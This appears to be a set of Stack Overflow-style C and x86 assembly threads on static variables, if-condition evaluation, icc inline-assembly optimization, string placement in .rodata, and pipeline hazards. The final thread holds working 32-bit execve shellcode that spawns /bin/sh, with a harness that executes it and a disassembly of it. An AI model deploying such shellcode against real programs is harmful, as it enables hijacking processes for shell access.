When static variables are created in c language - c

Here gdb does not stop at Line:4.
Next,
Without hitting the declaration line at Line:5, variable x is existing and initialized.
Next,
But here it shows out of scope (yes it should according to me).
Now I have the following doubts regarding this particular C program:
When exactly is the memory for variable x in P1() created and initialized?
Why did gdb not stop at the static declaration statement inside P1() in the first example?
If we call P1() again, will program control simply skip the declaration statement?

It has already been explained (in related topics linked in comments below question) how static variables work.
Here is the actual code generated by gcc for your p1 function (built with gcc -c -O0 -fomit-frame-pointer -g3 staticvar.c -o staticvar.o), then disassembled with the related source interleaved.
Disassembly of section .text:
0000000000000000 <p1>:
#include <stdio.h>
void p1(void)
{
0: 48 83 ec 08 sub $0x8,%rsp
static int x = 10;
x += 5;
4: 8b 05 00 00 00 00 mov 0x0(%rip),%eax # a <p1+0xa>
a: 83 c0 05 add $0x5,%eax
d: 89 05 00 00 00 00 mov %eax,0x0(%rip) # 13 <p1+0x13>
printf("%d\n", x);
13: 8b 05 00 00 00 00 mov 0x0(%rip),%eax # 19 <p1+0x19>
19: 89 c6 mov %eax,%esi
1b: bf 00 00 00 00 mov $0x0,%edi
20: b8 00 00 00 00 mov $0x0,%eax
25: e8 00 00 00 00 callq 2a <p1+0x2a>
}
2a: 90 nop
2b: 48 83 c4 08 add $0x8,%rsp
2f: c3 retq
So, as you can see, there is no code for the declaration of x. GDB can only break on an actual machine instruction, and as there is none for that line, it breaks on the next instruction (mov), which matches line 5.
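To make the behaviour above concrete, here is a minimal sketch (the function is changed to return x instead of printing it, purely so the effect is easy to check; that change is an assumption, not the asker's code). The static variable gets its storage and its initial value before the function is ever called, so each call only runs the x += 5 statement.

```c
/* Sketch: x is initialized once, as part of the program image,
 * not each time control passes the declaration. */
int p1(void)
{
    static int x = 10;  /* no instruction is emitted for this line */
    x += 5;             /* first executable statement in the function */
    return x;           /* 15 on the first call, 20 on the second, ... */
}
```

Calling p1() three times in a row yields 15, 20 and 25, which is why there is nothing for the debugger to stop on at the declaration, on the first call or on any later one.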

Related

'if' test condition in c - does it evaluate?

When calling a function in the test portion of an if statement in c, does it evaluate exactly as if you had called it normally? As in, will all the effects besides the return value evaluate and persist?
For example, if I want to include an error check when calling fseek, can I write
if (fseek(file, 0, SEEK_END)) { fprintf(stderr, "File too long"); }
and be functionally the same as:
long int i = fseek(file, 0, SEEK_END);
if (i) { fprintf(stderr, "File too long"); }
?
https://www.gnu.org/software/gnu-c-manual/gnu-c-manual.html#The-if-Statement
https://www.gnu.org/software/libc/manual/html_node/File-Positioning.html
Yes, this is exactly the same. The only difference is that you won't be able to reuse the result of the operation executed in the if statement.
In both cases the operation is executed BEFORE the condition (comparison) is tested. To illustrate this, we can look at the machine code generated for the two cases. Please note that the output machine code will vary depending on the OS and compiler.
Source file 'a.c':
#include <stdio.h>
int
main(void)
{
FILE *f = fopen("testfile", "r");
long int i = fseek(f, 0, SEEK_END);
if (i)
fprintf(stderr, "Error\n");
return 0;
}
$ gcc -O1 a.c -o a
Source file 'b.c':
#include <stdio.h>
int
main(void)
{
FILE *f = fopen("testfile", "r");
if (fseek(f, 0, SEEK_END))
fprintf(stderr, "Error\n");
return 0;
}
$ gcc -O1 b.c -o b
Note that in both cases I used the option '-O1', which allows the compiler to introduce small optimizations. This is mostly to make the machine code a little cleaner, since without optimization the compiler translates the source "literally" to machine code.
$ objdump -Mintel -D a |grep -i main -A20
0000000000001189 <main>:
1189: f3 0f 1e fa endbr64
118d: 48 83 ec 08 sub rsp,0x8
1191: 48 8d 35 6c 0e 00 00 lea rsi,[rip+0xe6c] # 2004 <_IO_stdin_used+0x4>
1198: 48 8d 3d 67 0e 00 00 lea rdi,[rip+0xe67] # 2006 <_IO_stdin_used+0x6>
119f: e8 dc fe ff ff call 1080 <fopen@plt>
# Interesting part
11a4: 48 89 c7 mov rdi,rax # Sets return of fopen as param 1
11a7: ba 02 00 00 00 mov edx,0x2 # Sets 0x2 (SEEK_END) as param 3
11ac: be 00 00 00 00 mov esi,0x0 # Sets 0 as param 2
11b1: e8 ba fe ff ff call 1070 <fseek@plt> # Call to FSEEK being made and stored in register
11b6: 85 c0 test eax,eax # Comparison being made
11b8: 75 0a jne 11c4 <main+0x3b> # Comparison jumping
# End of interesting part
11ba: b8 00 00 00 00 mov eax,0x0
11bf: 48 83 c4 08 add rsp,0x8
11c3: c3 ret
11c4: 48 8b 0d 55 2e 00 00 mov rcx,QWORD PTR [rip+0x2e55] # 4020 <stderr@@GLIBC_2.2.5>
11cb: ba 06 00 00 00 mov edx,0x6
11d0: be 01 00 00 00 mov esi,0x1
11d5: 48 8d 3d 33 0e 00 00 lea rdi,[rip+0xe33] # 200f <_IO_stdin_used+0xf>
11dc: e8 af fe ff ff call 1090 <fwrite@plt>
11e1: eb d7 jmp 11ba <main+0x31>
11e3: 66 2e 0f 1f 84 00 00 nop WORD PTR cs:[rax+rax*1+0x0]
11ea: 00 00 00
11ed: 0f 1f 00 nop DWORD PTR [rax]
Running objdump on binary 'b' yields almost identical machine code. To sum it up, whatever you put in your if statement is evaluated and yields an equivalent behind-the-scenes result whether or not you assign it to a variable first.
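The same point can be checked at the C level rather than in the disassembly. The following is only a sketch: the helper name length_after_if_fseek and the use of tmpfile() with a 5-byte payload are assumptions made for illustration. It calls fseek only inside the if test and then asks ftell where the file position ended up.

```c
#include <stdio.h>

/* Hypothetical helper: returns the file position after an fseek() that
 * was called only inside an if condition, or -1 on any failure. */
long length_after_if_fseek(void)
{
    FILE *f = tmpfile();              /* anonymous temporary file */
    if (f == NULL)
        return -1;
    if (fputs("hello", f) == EOF) {   /* write 5 bytes */
        fclose(f);
        return -1;
    }
    rewind(f);                        /* back to offset 0 */

    if (fseek(f, 0, SEEK_END)) {      /* the call happens here, inside the test */
        fclose(f);
        return -1;
    }

    long pos = ftell(f);              /* the seek persisted past the if */
    fclose(f);
    return pos;
}
```

If the temporary file can be created, the function returns 5: the seek performed inside the condition moved the file position exactly as a standalone call would have.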
Edit:
For reference, this is the output of $ objdump -Mintel -D b |grep -i main -A20:
0000000000001189 <main>:
1189: f3 0f 1e fa endbr64
118d: 48 83 ec 08 sub rsp,0x8
1191: 48 8d 35 6c 0e 00 00 lea rsi,[rip+0xe6c] # 2004 <_IO_stdin_used+0x4>
1198: 48 8d 3d 67 0e 00 00 lea rdi,[rip+0xe67] # 2006 <_IO_stdin_used+0x6>
119f: e8 dc fe ff ff call 1080 <fopen@plt>
# Interesting Part
11a4: 48 89 c7 mov rdi,rax
11a7: ba 02 00 00 00 mov edx,0x2
11ac: be 00 00 00 00 mov esi,0x0
11b1: e8 ba fe ff ff call 1070 <fseek@plt>
11b6: 85 c0 test eax,eax
11b8: 75 0a jne 11c4 <main+0x3b>
# End of interesting part
11ba: b8 00 00 00 00 mov eax,0x0
11bf: 48 83 c4 08 add rsp,0x8
11c3: c3 ret
11c4: 48 8b 0d 55 2e 00 00 mov rcx,QWORD PTR [rip+0x2e55] # 4020 <stderr@@GLIBC_2.2.5>
11cb: ba 06 00 00 00 mov edx,0x6
11d0: be 01 00 00 00 mov esi,0x1
11d5: 48 8d 3d 33 0e 00 00 lea rdi,[rip+0xe33] # 200f <_IO_stdin_used+0xf>
11dc: e8 af fe ff ff call 1090 <fwrite@plt>
11e1: eb d7 jmp 11ba <main+0x31>
11e3: 66 2e 0f 1f 84 00 00 nop WORD PTR cs:[rax+rax*1+0x0]
11ea: 00 00 00
11ed: 0f 1f 00 nop DWORD PTR [rax]
The short answer is yes (as in your trivial example), the long answer is maybe.
When the logical expression is more complex, C evaluates it only until the result of the whole expression is fully determined. The remaining operands are not evaluated.
Examples:
int x = 0;
if(x && foo()) {}
foo will not be called because x is false, which already makes the whole expression false.
int x = 1;
if(x && foo()) {}
foo will be called because x is true and the second part of the expression is needed to get the result.
This is called short-circuit evaluation, and the logical operators && and || in C are always evaluated this way.
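The two cases above can be verified with a call counter. This is a small sketch; foo_calls, calls_with_and and calls_with_or are hypothetical names introduced only for this illustration.

```c
static int foo_calls = 0;

/* Stand-in for a function with a side effect: it counts its own calls. */
static int foo(void)
{
    foo_calls++;
    return 1;
}

/* Returns how many times foo() ran while evaluating (x && foo()). */
int calls_with_and(int x)
{
    foo_calls = 0;
    if (x && foo()) { }
    return foo_calls;
}

/* Returns how many times foo() ran while evaluating (x || foo()). */
int calls_with_or(int x)
{
    foo_calls = 0;
    if (x || foo()) { }
    return foo_calls;
}
```

With x equal to 0, the && form never calls foo while the || form calls it once; with x equal to 1 the situation is reversed. So a function call in an if condition is only guaranteed to run when it is not the right-hand operand of a logical operator that has already been decided.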

How to stop icc from eliminating function called from inline assembly

Background
I'm making an app that needs to run several tasks concurrently. I can't use threads and such because the app should work without any OS (i.e. straight from the bootsector). Using x86 tasks looks like an overkill (both logically and performance-wise). Thus, I decided to implement a task-switching utility myself. I would save processor state, make a call to the task code and then restore the previous state. So I have to make the call from inline assembly.
Problem
Here's some example code:
#include <stdio.h>
void func() {
printf("Hello, world!\n");
}
void (*funcptr)();
int main() {
funcptr = func;
asm(
"call *%0;"
:
:"r"(funcptr)
);
return 0;
}
It compiles perfectly under icc with no options, gcc and clang and yields "Hello, world!" when run. However, if I compile it with icc main.c -ipo, it segfaults.
I disassembled the code that was generated by icc main.c and got the following:
0000000000401220 <main>:
401220: 55 push %rbp
401221: 48 89 e5 mov %rsp,%rbp
401224: 48 83 e4 80 and $0xffffffffffffff80,%rsp
401228: 48 81 ec 80 00 00 00 sub $0x80,%rsp
40122f: bf 03 00 00 00 mov $0x3,%edi
401234: 33 f6 xor %esi,%esi
401236: e8 45 00 00 00 callq 401280 <__intel_new_feature_proc_init>
40123b: 0f ae 1c 24 stmxcsr (%rsp)
40123f: 48 c7 05 f6 78 00 00 movq $0x401270,0x78f6(%rip) # 408b40 <funcptr>
401246: 70 12 40 00
40124a: b8 70 12 40 00 mov $0x401270,%eax
40124f: 81 0c 24 40 80 00 00 orl $0x8040,(%rsp)
401256: 0f ae 14 24 ldmxcsr (%rsp)
40125a: ff d0 callq *%rax
40125c: 33 c0 xor %eax,%eax
40125e: 48 89 ec mov %rbp,%rsp
401261: 5d pop %rbp
401262: c3 retq
401263: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)
401268: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1)
40126f: 00
0000000000401270 <func>:
401270: bf 04 40 40 00 mov $0x404004,%edi
401275: e9 e6 fd ff ff jmpq 401060 <puts@plt>
40127a: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1)
On the other hand, icc main.c -ipo yields:
0000000000401210 <main>:
401210: 55 push %rbp
401211: 48 89 e5 mov %rsp,%rbp
401214: 48 83 e4 80 and $0xffffffffffffff80,%rsp
401218: 48 81 ec 80 00 00 00 sub $0x80,%rsp
40121f: bf 03 00 00 00 mov $0x3,%edi
401224: 33 f6 xor %esi,%esi
401226: e8 25 00 00 00 callq 401250 <__intel_new_feature_proc_init>
40122b: 0f ae 1c 24 stmxcsr (%rsp)
40122f: 81 0c 24 40 80 00 00 orl $0x8040,(%rsp)
401236: 48 8b 05 cb 2d 00 00 mov 0x2dcb(%rip),%rax # 404008 <funcptr_2.dp.0>
40123d: 0f ae 14 24 ldmxcsr (%rsp)
401241: ff d0 callq *%rax
401243: 33 c0 xor %eax,%eax
401245: 48 89 ec mov %rbp,%rsp
401248: 5d pop %rbp
401249: c3 retq
40124a: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1)
So, while -ipo didn't remove the funcptr variable (see address 401236), it did remove the assignment. I guess that icc noticed that func is not called from C code, so it can be safely removed, and funcptr is therefore allowed to contain garbage. However, it didn't notice that I'm calling func indirectly via assembly.
What I tried
Replacing "r"(funcptr) with "r"(func) works but I can't hardcode a specific function (see background).
Calling funcptr and/or func before and/or after the inline assembly block doesn't help because icc just inlines printf("Hello, world!\n");.
I can't get rid of inline assembly because I have to do low-level register, flags and stack manipulation before and after call.
Making funcptr volatile yields the following warning but still segfaults:
a value of type "void (*)()" cannot be assigned to an entity of type "volatile void (*)()"
Adding volatile to almost every other word doesn't help either.
Moving func and/or funcptr to other source files and then linking them together doesn't help.
Moving inline assembly to a separate function doesn't work.
Am I doing something wrong or is it an icc bug? If the former, how do I fix the code? If the latter, is there any workaround and should I report the bug?
$ icc --version
icc (ICC) 19.1.0.166 20191121
Copyright (C) 1985-2019 Intel Corporation. All rights reserved.

How does a compiled "Hello World" C program store the String using machine language?

So I've started learning about machine language today. I wrote a basic "Hello World" program in C which prints "Hello, world!" ten times using a for loop. I then used the GNU Debugger to disassemble main and look at the code in machine language (my computer has an x86 processor and I've set gdb up to use Intel syntax):
user@PC:~/Path/To/Code$ gdb -q ./a.out
Reading symbols from ./a.out...done.
(gdb) list
1 #include <stdio.h>
2
3 int main()
4 {
5 int i;
6 for(i = 0; i < 10; i++) {
7 printf("Hello, world!\n");
8 }
9 return 0;
10 }
(gdb) disassemble main
Dump of assembler code for function main:
0x0804841d <+0>: push ebp
0x0804841e <+1>: mov ebp,esp
0x08048420 <+3>: and esp,0xfffffff0
0x08048423 <+6>: sub esp,0x20
0x08048426 <+9>: mov DWORD PTR [esp+0x1c],0x0
0x0804842e <+17>: jmp 0x8048441 <main+36>
0x08048430 <+19>: mov DWORD PTR [esp],0x80484e0
0x08048437 <+26>: call 0x80482f0 <puts@plt>
0x0804843c <+31>: add DWORD PTR [esp+0x1c],0x1
0x08048441 <+36>: cmp DWORD PTR [esp+0x1c],0x9
0x08048446 <+41>: jle 0x8048430 <main+19>
0x08048448 <+43>: mov eax,0x0
0x0804844d <+48>: leave
0x0804844e <+49>: ret
End of assembler dump.
(gdb) x/s 0x80484e0
0x80484e0: "Hello, world!"
I understand most of the machine code and what each of the commands do. If I understood it correctly, the address "0x80484e0" is loaded into the esp register so that can use the memory at this address. I examined the address, and to no surprise it contained the desired string. My question now is - how did that string get there in the first place? I can't find a part in the program that sets the string up at this location.
I also don't understand something else: When I first start the program, the eip points to , where the variable i is initialized at [esp+0x1c]. However, the address that esp points to is changed later on in the program (to 0x80484e0), but [esp+0x1c] is still used for "i" after that change. Shouldn't the address [esp+0x1c] change when the address esp points to changes?
A binary or program is made up of both machine code and data. In this case the string you put in the source code is data, which is just bytes, and the compiler took that data and, because of how it was used, treated it as read-only. Depending on the compiler, that might land in .rodata or .text or a section with some other name; gcc would probably call it .rodata. The program itself is in .text. The linker comes along and finds a place for .text, .data, .bss, .rodata, and any other items you may have, and then connects the dots. In the case of your call to printf, the linker knows where it put the string (the array of bytes) and what its name was (some internal temporary name, no doubt). The printf call was told about that name too, so the linker patches up the instruction that loads the address of the format string before calling printf.
Disassembly of section .text:
0000000000400430 <main>:
400430: 53 push %rbx
400431: bb 0a 00 00 00 mov $0xa,%ebx
400436: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
40043d: 00 00 00
400440: bf e4 05 40 00 mov $0x4005e4,%edi
400445: e8 b6 ff ff ff callq 400400 <puts@plt>
40044a: 83 eb 01 sub $0x1,%ebx
40044d: 75 f1 jne 400440 <main+0x10>
40044f: 31 c0 xor %eax,%eax
400451: 5b pop %rbx
400452: c3 retq
400453: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
40045a: 00 00 00
40045d: 0f 1f 00 nopl (%rax)
Disassembly of section .rodata:
00000000004005e0 <_IO_stdin_used>:
4005e0: 01 00 add %eax,(%rax)
4005e2: 02 00 add (%rax),%al
4005e4: 48 rex.W
4005e5: 65 6c gs insb (%dx),%es:(%rdi)
4005e7: 6c insb (%dx),%es:(%rdi)
4005e8: 6f outsl %ds:(%rsi),(%dx)
4005e9: 2c 20 sub $0x20,%al
4005eb: 77 6f ja 40065c <__GNU_EH_FRAME_HDR+0x68>
4005ed: 72 6c jb 40065b <__GNU_EH_FRAME_HDR+0x67>
4005ef: 64 21 00 and %eax,%fs:(%rax)
The compiler will have encoded this instruction but left the address as zeros, or some other fill,
400440: bf e4 05 40 00 mov $0x4005e4,%edi
so that the linker could fill it in later. The GNU disassembler attempts to disassemble the .rodata (and .data, etc.) blocks, which doesn't make sense, so ignore the instructions shown there; it is trying to interpret your string, which starts at address 0x4005e4, as code.
Before linking a disassembly of the object shows the two sections .text and .rodata
Disassembly of section .text.startup:
0000000000000000 <main>:
0: 53 push %rbx
1: bb 0a 00 00 00 mov $0xa,%ebx
6: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
d: 00 00 00
10: bf 00 00 00 00 mov $0x0,%edi
15: e8 00 00 00 00 callq 1a <main+0x1a>
1a: 83 eb 01 sub $0x1,%ebx
1d: 75 f1 jne 10 <main+0x10>
1f: 31 c0 xor %eax,%eax
21: 5b pop %rbx
22: c3 retq
0000000000000000 <.rodata.str1.1>:
0: 48 rex.W
1: 65 6c gs insb (%dx),%es:(%rdi)
3: 6c insb (%dx),%es:(%rdi)
4: 6f outsl %ds:(%rsi),(%dx)
5: 2c 20 sub $0x20,%al
7: 77 6f ja 78 <main+0x78>
9: 72 6c jb 77 <main+0x77>
b: 64 21 00 and %eax,%fs:(%rax)
Unlinked, the compiler just has to pad this address/offset for the linker to fill in later.
10: bf 00 00 00 00 mov $0x0,%edi
Also note that the object contains only the string in .rodata. Linking with libraries and other items to make it a complete program clearly added more .rodata, but the linker manages all of that.
Perhaps easier to see with this example
void more_fun ( unsigned int, unsigned int, unsigned int );
unsigned int a;
unsigned int b=5;
const unsigned int c=7;
void fun ( void )
{
more_fun(a,b,c);
}
disassembled as an object
Disassembly of section .text:
0000000000000000 <fun>:
0: 8b 35 00 00 00 00 mov 0x0(%rip),%esi # 6 <fun+0x6>
6: 8b 3d 00 00 00 00 mov 0x0(%rip),%edi # c <fun+0xc>
c: ba 07 00 00 00 mov $0x7,%edx
11: e9 00 00 00 00 jmpq 16 <fun+0x16>
Disassembly of section .data:
0000000000000000 <b>:
0: 05 .byte 0x5
1: 00 00 add %al,(%rax)
...
Disassembly of section .rodata:
0000000000000000 <c>:
0: 07 (bad)
1: 00 00 add %al,(%rax)
...
For whatever reason, you have to link it to see the .bss section. The point of the example is that the machine code for the function is in .text, the uninitialized global is in .bss, the initialized global is in .data, and the const initialized global is in .rodata. The compiler was smart enough to know that a const, even if it is global, won't change, so it can hardcode that value into the instruction and not need to read it from RAM. The other two variables have to be read from RAM, so the compiler generates instructions with the addresses left as zeros, to be filled in by the linker at link time.
In your case your read-only/const data was a collection of bytes and it wasn't used in a math operation, so the bytes as defined in your source file were placed in memory so they could be pointed at as the first parameter to printf.
There is more to a binary than just machine code. The compiler and linker can have things placed in memory for the machine code to read; the machine code itself does not have to write every value that will be used by the rest of the machine code.
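As a compact recap of the placement described above, here is a sketch that combines the three kinds of globals with a string literal. The section names in the comments are what GCC typically uses on ELF targets and are an assumption about the toolchain; greeting, greeting_length and sum_globals are hypothetical names used only here.

```c
#include <string.h>

unsigned int a;              /* uninitialized global: typically .bss    */
unsigned int b = 5;          /* initialized global:   typically .data   */
const unsigned int c = 7;    /* const global:         typically .rodata */

/* The literal's bytes are already in the binary; the function only
 * returns their address, it never "builds" the string at run time. */
const char *greeting(void)
{
    return "Hello, world!";  /* typically .rodata */
}

/* Length of the literal, read straight from the loaded image. */
size_t greeting_length(void)
{
    return strlen(greeting());
}

/* a is zero-initialized by the loader, b and c come from the file. */
unsigned int sum_globals(void)
{
    return a + b + c;
}
```

None of these functions contains code that stores 5, 7 or the characters of the string anywhere; the values are present before the first instruction runs. Compiling this to an object file and inspecting it with nm or objdump should show the symbols in the corresponding sections, though the exact names can differ between compilers.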
The compiler 'hard wires' the string into the object code and the linker then 'hard wires' it into the machine code.
Note that the string is embedded in read-only memory alongside the code, not stored in a writable data area, meaning that if you took a pointer to the string and attempted to change it you would get an exception.

Create a Data Hazard in a C Program

I am working on a problem where I am attempting to create different scenarios in different C programs such as
Data Hazard
Branch Evaluation
Procedure Call
This is in an attempt at learning pipelining and the different hazards that come up.
So I am writing simple C programs and disassembling them to assembly language to see if a hazard gets created. But I cannot figure out how to create these hazards. Does anyone have any idea how I could do this? Here is some of the simple code I have written.
I compile using.
gcc -g -c programName.c -o programName.o
gcc programName.o -o programName
objdump -d programName.o > programName.asm
Code:
#include <stdio.h>
int main()
{
int i = 0;
int size = 5;
int num[5] = {1,2,3,4,5};
int sum=0;
int average = 0;
for(i = 0; i < size; i++)
{
sum += num[i];
}
average=sum/size;
return 0;
}
...and here is the assembly for that.
average.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <main>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: c7 45 f0 00 00 00 00 movl $0x0,0xfffffffffffffff0(%rbp)
b: c7 45 f4 05 00 00 00 movl $0x5,0xfffffffffffffff4(%rbp)
12: c7 45 d0 01 00 00 00 movl $0x1,0xffffffffffffffd0(%rbp)
19: c7 45 d4 02 00 00 00 movl $0x2,0xffffffffffffffd4(%rbp)
20: c7 45 d8 03 00 00 00 movl $0x3,0xffffffffffffffd8(%rbp)
27: c7 45 dc 04 00 00 00 movl $0x4,0xffffffffffffffdc(%rbp)
2e: c7 45 e0 05 00 00 00 movl $0x5,0xffffffffffffffe0(%rbp)
35: c7 45 f8 00 00 00 00 movl $0x0,0xfffffffffffffff8(%rbp)
3c: c7 45 fc 00 00 00 00 movl $0x0,0xfffffffffffffffc(%rbp)
43: c7 45 f0 00 00 00 00 movl $0x0,0xfffffffffffffff0(%rbp)
4a: eb 10 jmp 5c <main+0x5c>
4c: 8b 45 f0 mov 0xfffffffffffffff0(%rbp),%eax
4f: 48 98 cltq
51: 8b 44 85 d0 mov 0xffffffffffffffd0(%rbp,%rax,4),%eax
55: 01 45 f8 add %eax,0xfffffffffffffff8(%rbp)
58: 83 45 f0 01 addl $0x1,0xfffffffffffffff0(%rbp)
5c: 8b 45 f0 mov 0xfffffffffffffff0(%rbp),%eax
5f: 3b 45 f4 cmp 0xfffffffffffffff4(%rbp),%eax
62: 7c e8 jl 4c <main+0x4c>
64: 8b 55 f8 mov 0xfffffffffffffff8(%rbp),%edx
67: 89 d0 mov %edx,%eax
69: c1 fa 1f sar $0x1f,%edx
6c: f7 7d f4 idivl 0xfffffffffffffff4(%rbp)
6f: 89 45 fc mov %eax,0xfffffffffffffffc(%rbp)
72: b8 00 00 00 00 mov $0x0,%eax
77: c9 leaveq
78: c3 retq
Would appreciate any insight or help. Thanks!
Since this is homework, I'm not going to give you a straight answer, but some food for thought to push you in the right direction.
x86 is a terrible ISA to be using to try and comprehend pipelining. A single x86 instruction can hide two or three side-effects, making it difficult to tease out how a given instruction would perform in even the simplest of pipelines. Are you sure you're not provided a RISC ISA to use for this problem?
Put your loop/hazard code into a function and preferably randomize the creation of the array. Make the array much longer. A good compiler will basically figure out the answer otherwise and remove most of the code you wrote! For reasons I don't understand it's putting your variables in memory.
A good compiler will also do things such as loop unrolling in an attempt to hide data hazards and get better code scheduling. Learn how to defeat that (or, if messing around with the compiler is allowed, give the compiler the flag telling it NOT to do those things).
The keyword "volatile" can be very helpful in telling the compiler to not optimize around/away certain variables (it tells the compiler this value can change at any moment, so don't be clever and optimize code with it and also don't keep the variable inside the register file).
A data hazard means the pipeline will stall waiting on data. Normally instructions get bypassed just in time, so no stalling occurs. Think about which types of instructions may not be able to be bypassed and could cause a stall on a data hazard. This is dependent on the pipeline, so code that stalls for a specific processor may not stall for another. Modern out-of-order Intel processors are excellent at avoiding these stalls and compilers are great at re-scheduling code so they won't occur even on an in-order core.
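As one possible starting point for the hints above, here is a sketch of a loop moved into its own function, with the input marked volatile so the compiler cannot precompute the result. The name dependent_sum is hypothetical, and whether any stall actually occurs depends entirely on the target pipeline and the compiler's scheduling.

```c
#include <stddef.h>

/* Each iteration loads a value and uses it immediately in an add whose
 * other operand is the previous iteration's result. That gives two
 * read-after-write dependencies per iteration: load -> add, and
 * add -> next add. */
int dependent_sum(const volatile int *data, size_t n)
{
    int sum = 0;
    for (size_t i = 0; i < n; i++) {
        int loaded = data[i];  /* volatile: the load cannot be optimized away */
        sum += loaded;         /* consumes the loaded value right away */
    }
    return sum;
}
```

Disassembling this function, ideally for a simple in-order RISC target, should show a load directly followed by an instruction that consumes its result, which is the instruction pair to study when looking for a load-use hazard.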

shellcode executes /bin/sh but not ./abcde

I am trying to run some shellcode on a server where I don't have access to the shell, but I do have access to my own executable bash script.
My shellcode looks like this:
unsigned char code[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
"\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff/bin/sh";
When I run it locally, I spawn a shell with the code. I can also run other commands such as /bin/ls... However, when I change /bin/sh to ./abcde it won't run my executable.
unsigned char code[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
"\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff./abcde";
What am I doing wrong? I am on an x86-32 machine.
EDIT:
To make it more clear, this is the scenario:
unsigned char code[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
"\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff/bin/sh";
unsigned char code1[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
"\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff./abcde";
int main(void){
void (*f)(void);
f = (void (*)(void))code; //works
f = (void (*)(void))code1; //Does NOT work
f();
}
Your program is not very portable as you include ia32 instructions in your strings. With some help from gdb it was easier to read:
(gdb) disassemble/r code,code1
Dump of assembler code from 0x804a040 to 0x804a080:
0x0804a040 <code+0>: eb 15 jmp 0x804a057 <code+23>
0x0804a042 <code+2>: 5b pop %ebx
0x0804a043 <code+3>: 31 c0 xor %eax,%eax
0x0804a045 <code+5>: 89 5b 08 mov %ebx,0x8(%ebx)
0x0804a048 <code+8>: 88 43 07 mov %al,0x7(%ebx)
0x0804a04b <code+11>: 8d 4b 08 lea 0x8(%ebx),%ecx
0x0804a04e <code+14>: 89 43 0c mov %eax,0xc(%ebx)
0x0804a051 <code+17>: 89 c2 mov %eax,%edx
0x0804a053 <code+19>: b0 0b mov $0xb,%al
0x0804a055 <code+21>: cd 80 int $0x80
0x0804a057 <code+23>: e8 e6 ff ff ff call 0x804a042 <code+2>
0x0804a05c <code+28>: 2f das
0x0804a05d <code+29>: 62 69 6e bound %ebp,0x6e(%ecx)
0x0804a060 <code+32>: 2f das
0x0804a061 <code+33>: 73 68 jae 0x804a0cb
0x0804a063 <code+35>: 00 00 add %al,(%eax)
0x0804a065: 00 00 add %al,(%eax)
0x0804a067: 00 00 add %al,(%eax)
0x0804a069: 00 00 add %al,(%eax)
0x0804a06b: 00 00 add %al,(%eax)
0x0804a06d: 00 00 add %al,(%eax)
0x0804a06f: 00 00 add %al,(%eax)
0x0804a071: 00 00 add %al,(%eax)
0x0804a073: 00 00 add %al,(%eax)
0x0804a075: 00 00 add %al,(%eax)
0x0804a077: 00 00 add %al,(%eax)
0x0804a079: 00 00 add %al,(%eax)
0x0804a07b: 00 00 add %al,(%eax)
0x0804a07d: 00 00 add %al,(%eax)
0x0804a07f: 00 eb add %ch,%bl
However, a helpful compiler puts the code in a data segment, which will cause a segmentation fault when the processor jumps to the "string" and tries to execute from it.
I think this is a similar question:
sys_execve system call from Assembly
A careful reading of the question reveals what is actually going on. Indeed the compiler will happily bork you by placing this in a data region; however, the targeted OS platform probably doesn't have NX enabled (enabling NX on arbitrary 32-bit processes was a recipe for disaster for a long time, as GCC extensions required the stack to be executable).
The actual problem is that you don't have execute access to bash. Your ./abcde is a bash script by your own admission, so the loader interprets #!/bin/bash, goes to open /bin/bash, discovers you don't have x permissions, and barfs. exec() returns -Esomething, with unpredictable results when you run off the end of the shellcode.
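The failure mode described above is easier to diagnose from plain C, where the return from execve can be inspected instead of falling through into whatever bytes follow. The sketch below assumes a POSIX system, and try_exec is a hypothetical helper name. Through the C library, a failed execve returns -1 and sets errno; the raw int 0x80 system call used by the shellcode instead leaves the negated error code in eax.

```c
#include <errno.h>
#include <unistd.h>

/* Hypothetical helper: tries to replace the current process with `path`.
 * It returns only if execve() failed, handing back the errno value. */
int try_exec(const char *path)
{
    char *const argv[] = { (char *)path, NULL };
    char *const envp[] = { NULL };   /* empty environment */

    execve(path, argv, envp);        /* on success this never returns */
    return errno;                    /* e.g. ENOENT or EACCES */
}
```

A path that does not exist gives ENOENT, and a missing execute permission on the file or on its #! interpreter would typically show up as EACCES. The shellcode has no such check after int $0x80, so on failure execution simply continues into the call instruction and the string bytes.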

Resources